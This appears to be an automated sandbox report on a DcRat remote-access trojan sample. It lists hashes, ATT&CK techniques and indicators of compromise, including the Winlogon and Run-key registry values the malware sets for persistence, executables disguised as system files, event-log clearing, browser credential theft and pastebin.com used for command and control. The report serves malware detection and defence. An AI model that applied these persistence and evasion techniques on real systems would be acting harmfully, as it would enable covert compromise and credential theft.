dcrat | b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240

Resubmissions

14/01/2025, 04:21

250114-ey7b5swqav 10

14/01/2025, 03:05

250114-dlfszsvmgw 10

Analysis

max time kernel
900s
max time network
901s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14/01/2025, 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Size

65.7MB
MD5

c9f4668c97eb480751e1bbf6173fc4e1
SHA1

528deade2bc88cafc26f78f7c73490b66abdf370
SHA256

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
SHA512

dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
SSDEEP

196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY

Score

10^/10

dcrat defense_evasion discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\", \"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\", \"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\", \"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\""	ServerComponenthostMonitorDll.exe

Modifies security service 2 TTPs 3 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection = 22020100	svchost.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	852	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2160	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1416	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2060	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2288	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3056	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2264	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	784	2432	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	956	2432	schtasks.exe	37

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 2576 created 1244	2576	twain_32.exe	21
PID 2576 created 1244	2576	twain_32.exe	21
PID 2576 created 1244	2576	twain_32.exe	21
PID 2576 created 1244	2576	twain_32.exe	21
PID 2576 created 1244	2576	twain_32.exe	21
PID 2576 created 1244	2576	twain_32.exe	21
PID 1516 created 1244	1516	updater.exe	21
PID 1516 created 1244	1516	updater.exe	21
PID 1516 created 1244	1516	updater.exe	21
PID 1516 created 1244	1516	updater.exe	21
PID 1516 created 1244	1516	updater.exe	21
PID 1516 created 1244	1516	updater.exe	21
PID 1516 created 1244	1516	updater.exe	21

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
1664	powershell.exe
1556	powershell.exe
1788	powershell.exe
1308	powershell.exe
2356	powershell.exe
1484	powershell.exe
1224	powershell.exe
1400	powershell.exe
1312	powershell.exe
1660	powershell.exe
860	powershell.exe
340	powershell.exe
2996	powershell.exe
768	powershell.exe
2412	powershell.exe
2840	powershell.exe
1108	powershell.exe
2476	powershell.exe
2472	powershell.exe
912	powershell.exe
916	powershell.exe
2200	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 12 IoCs

pid	Process
2780	Astral private DLL.exe
2576	twain_32.exe
2644	ServerComponenthostMonitorDll.exe
1684	OSPPSVC.exe
1516	updater.exe
2812	OSPPSVC.exe
3032	dwm.exe
1416	Idle.exe
2040	ServerComponenthostMonitorDll.exe
2256	audiodg.exe
2340	cmd.exe
860	OSPPSVC.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 5 IoCs

pid	Process
2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
2580	cmd.exe
2580	cmd.exe
2716	taskeng.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe

Drops desktop.ini file(s) 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BY17T927\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MT4W94IX\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T1DP8V76\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UGWF8QWZ\desktop.ini	DllHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	pastebin.com
10	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
860	powercfg.exe
2220	powercfg.exe
1936	cmd.exe
2000	powercfg.exe
2472	powercfg.exe
1660	powercfg.exe
1224	powercfg.exe
1028	cmd.exe
1744	powercfg.exe
1936	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\Windows\System32\CSC9175271B41B14A2EA1B778189E3E6F6.TMP	csc.exe
File created	\??\c:\Windows\System32\byyuy-.exe	csc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2576 set thread context of 2348	2576	twain_32.exe	112
PID 1516 set thread context of 2964	1516	updater.exe	138
PID 1516 set thread context of 2972	1516	updater.exe	145
PID 1516 set thread context of 2360	1516	updater.exe	146

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files\Windows NT\Accessories\audiodg.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Windows NT\Accessories\42af1c969fbb7b	ServerComponenthostMonitorDll.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\6cb0b6c459d5d3	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain_32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1308	sc.exe
2396	sc.exe
600	sc.exe
1564	sc.exe
2312	sc.exe
1700	sc.exe
1520	sc.exe
1760	sc.exe
1740	sc.exe
588	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Astral private DLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20ec5a323c66db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2632	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1520	schtasks.exe
784	schtasks.exe
956	schtasks.exe
2224	schtasks.exe
1696	schtasks.exe
3056	schtasks.exe
2160	schtasks.exe
2264	schtasks.exe
2344	schtasks.exe
852	schtasks.exe
2256	schtasks.exe
2288	schtasks.exe
1912	schtasks.exe
1500	schtasks.exe
2060	schtasks.exe
2296	schtasks.exe
1896	schtasks.exe
2792	schtasks.exe
1416	schtasks.exe
2312	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe
2644	ServerComponenthostMonitorDll.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1684	OSPPSVC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2644	ServerComponenthostMonitorDll.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	860	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	1684	OSPPSVC.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	2348	dialer.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeAuditPrivilege	864	svchost.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeShutdownPrivilege	1660	powercfg.exe
Token: SeShutdownPrivilege	2472	powercfg.exe
Token: SeShutdownPrivilege	1224	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	864	svchost.exe
Token: SeIncreaseQuotaPrivilege	864	svchost.exe
Token: SeSecurityPrivilege	864	svchost.exe
Token: SeTakeOwnershipPrivilege	864	svchost.exe
Token: SeLoadDriverPrivilege	864	svchost.exe
Token: SeSystemtimePrivilege	864	svchost.exe
Token: SeBackupPrivilege	864	svchost.exe
Token: SeRestorePrivilege	864	svchost.exe
Token: SeShutdownPrivilege	864	svchost.exe
Token: SeSystemEnvironmentPrivilege	864	svchost.exe
Token: SeUndockPrivilege	864	svchost.exe
Token: SeManageVolumePrivilege	864	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	864	svchost.exe
Token: SeIncreaseQuotaPrivilege	864	svchost.exe
Token: SeSecurityPrivilege	864	svchost.exe
Token: SeTakeOwnershipPrivilege	864	svchost.exe
Token: SeLoadDriverPrivilege	864	svchost.exe
Token: SeSystemtimePrivilege	864	svchost.exe
Token: SeBackupPrivilege	864	svchost.exe
Token: SeRestorePrivilege	864	svchost.exe
Token: SeShutdownPrivilege	864	svchost.exe
Token: SeSystemEnvironmentPrivilege	864	svchost.exe
Token: SeUndockPrivilege	864	svchost.exe
Token: SeManageVolumePrivilege	864	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	864	svchost.exe
Token: SeIncreaseQuotaPrivilege	864	svchost.exe
Token: SeSecurityPrivilege	864	svchost.exe
Token: SeTakeOwnershipPrivilege	864	svchost.exe
Token: SeLoadDriverPrivilege	864	svchost.exe
Token: SeSystemtimePrivilege	864	svchost.exe
Token: SeBackupPrivilege	864	svchost.exe
Token: SeRestorePrivilege	864	svchost.exe
Token: SeShutdownPrivilege	864	svchost.exe
Token: SeSystemEnvironmentPrivilege	864	svchost.exe
Token: SeUndockPrivilege	864	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 2780	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 2712 wrote to memory of 2780	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 2712 wrote to memory of 2780	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 2712 wrote to memory of 2780	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 2712 wrote to memory of 2576	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 2712 wrote to memory of 2576	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 2712 wrote to memory of 2576	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 2712 wrote to memory of 2576	2712	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 2780 wrote to memory of 2824	2780	Astral private DLL.exe	32
PID 2780 wrote to memory of 2824	2780	Astral private DLL.exe	32
PID 2780 wrote to memory of 2824	2780	Astral private DLL.exe	32
PID 2780 wrote to memory of 2824	2780	Astral private DLL.exe	32
PID 2824 wrote to memory of 2580	2824	WScript.exe	33
PID 2824 wrote to memory of 2580	2824	WScript.exe	33
PID 2824 wrote to memory of 2580	2824	WScript.exe	33
PID 2824 wrote to memory of 2580	2824	WScript.exe	33
PID 2580 wrote to memory of 2632	2580	cmd.exe	35
PID 2580 wrote to memory of 2632	2580	cmd.exe	35
PID 2580 wrote to memory of 2632	2580	cmd.exe	35
PID 2580 wrote to memory of 2632	2580	cmd.exe	35
PID 2580 wrote to memory of 2644	2580	cmd.exe	36
PID 2580 wrote to memory of 2644	2580	cmd.exe	36
PID 2580 wrote to memory of 2644	2580	cmd.exe	36
PID 2580 wrote to memory of 2644	2580	cmd.exe	36
PID 2644 wrote to memory of 1332	2644	ServerComponenthostMonitorDll.exe	41
PID 2644 wrote to memory of 1332	2644	ServerComponenthostMonitorDll.exe	41
PID 2644 wrote to memory of 1332	2644	ServerComponenthostMonitorDll.exe	41
PID 1332 wrote to memory of 1944	1332	csc.exe	43
PID 1332 wrote to memory of 1944	1332	csc.exe	43
PID 1332 wrote to memory of 1944	1332	csc.exe	43
PID 2644 wrote to memory of 1484	2644	ServerComponenthostMonitorDll.exe	59
PID 2644 wrote to memory of 1484	2644	ServerComponenthostMonitorDll.exe	59
PID 2644 wrote to memory of 1484	2644	ServerComponenthostMonitorDll.exe	59
PID 2644 wrote to memory of 2996	2644	ServerComponenthostMonitorDll.exe	60
PID 2644 wrote to memory of 2996	2644	ServerComponenthostMonitorDll.exe	60
PID 2644 wrote to memory of 2996	2644	ServerComponenthostMonitorDll.exe	60
PID 2644 wrote to memory of 340	2644	ServerComponenthostMonitorDll.exe	62
PID 2644 wrote to memory of 340	2644	ServerComponenthostMonitorDll.exe	62
PID 2644 wrote to memory of 340	2644	ServerComponenthostMonitorDll.exe	62
PID 2644 wrote to memory of 768	2644	ServerComponenthostMonitorDll.exe	63
PID 2644 wrote to memory of 768	2644	ServerComponenthostMonitorDll.exe	63
PID 2644 wrote to memory of 768	2644	ServerComponenthostMonitorDll.exe	63
PID 2644 wrote to memory of 2356	2644	ServerComponenthostMonitorDll.exe	64
PID 2644 wrote to memory of 2356	2644	ServerComponenthostMonitorDll.exe	64
PID 2644 wrote to memory of 2356	2644	ServerComponenthostMonitorDll.exe	64
PID 2644 wrote to memory of 1224	2644	ServerComponenthostMonitorDll.exe	65
PID 2644 wrote to memory of 1224	2644	ServerComponenthostMonitorDll.exe	65
PID 2644 wrote to memory of 1224	2644	ServerComponenthostMonitorDll.exe	65
PID 2644 wrote to memory of 1556	2644	ServerComponenthostMonitorDll.exe	66
PID 2644 wrote to memory of 1556	2644	ServerComponenthostMonitorDll.exe	66
PID 2644 wrote to memory of 1556	2644	ServerComponenthostMonitorDll.exe	66
PID 2644 wrote to memory of 1400	2644	ServerComponenthostMonitorDll.exe	67
PID 2644 wrote to memory of 1400	2644	ServerComponenthostMonitorDll.exe	67
PID 2644 wrote to memory of 1400	2644	ServerComponenthostMonitorDll.exe	67
PID 2644 wrote to memory of 1788	2644	ServerComponenthostMonitorDll.exe	69
PID 2644 wrote to memory of 1788	2644	ServerComponenthostMonitorDll.exe	69
PID 2644 wrote to memory of 1788	2644	ServerComponenthostMonitorDll.exe	69
